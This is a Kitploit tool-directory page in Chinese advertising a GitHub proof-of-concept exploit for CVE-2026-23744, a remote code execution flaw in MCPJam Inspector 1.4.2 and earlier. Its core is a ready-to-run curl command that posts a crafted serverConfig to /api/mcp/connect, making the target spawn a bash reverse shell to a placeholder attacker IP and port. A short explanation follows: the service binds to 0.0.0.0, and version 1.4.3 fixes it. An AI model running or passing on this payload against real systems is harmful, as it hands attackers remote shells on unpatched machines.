Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-23744-PoC — 概念验证漏洞利用程序,针对CVE-2026-23744(MCPJam Inspector中的远程代码执行漏洞)。演示通过向 /api/mcp/connect 端点发送精心构造的HTTP请求(附带反向shell载荷)实现RCE。 | Kitploit
工具/GitHubGitHub/mrr0b0t19/cve-2026-23744-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubmrr0b0t19/cve-2026-23744-poc

CVE-2026-23744-PoC

概念验证漏洞利用程序,针对CVE-2026-23744(MCPJam Inspector中的远程代码执行漏洞)。演示通过向 /api/mcp/connect 端点发送精心构造的HTTP请求(附带反向shell载荷)实现RCE。

查看仓库
13个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-23744-PoC

关于MCP Server漏洞的PoC。

自动生成带有正确正文的帖子部分。

漏洞路径:

root@kitploit:~
/api/mcp/connect

通过curl的方法:

root@kitploit:~
curl http://evil.com:6274/api/mcp/connect   --header "Content-Type: application/json"   --data '{"serverConfig":{"command":"bash","args":["-c","bash -i >& /dev/tcp/TUIP/TUPUERTO 0>&1"],"env":{}},"serverId":"pruebaxd"}'

为何发生?

MCPJam Inspector是第一个用于MCP服务器的本地开发平台。1.4.2及更早版本存在远程代码执行(RCE)漏洞,攻击者可发送特制HTTP请求触发MCP服务器安装,导致RCE。由于MCPJam Inspector默认监听0.0.0.0而非127.0.0.1,攻击者可以通过简单的HTTP请求远程触发RCE。1.4.3版本包含补丁。

下载工具